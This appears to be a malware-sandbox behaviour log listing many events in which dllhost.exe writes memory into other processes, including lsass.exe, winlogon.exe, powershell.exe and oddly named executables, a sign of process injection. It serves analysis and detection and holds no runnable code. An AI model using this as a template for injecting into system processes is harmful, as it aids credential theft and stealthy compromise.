Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2210000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 850000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 21F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2FD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 840000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 15E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1C115C40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1BB497C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3DBE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\MzWhoQ.exe base: 21F46E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\MzWhoQ.exe base: 21F47070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 220557A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE14340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 9310000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1AFE4460000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 27C93250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 24463CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227C0130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23A44F90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F530850000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13376160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3010000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 11B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: F90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2AC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 980000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2870000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2210000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 850000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 21F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2FD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D60000
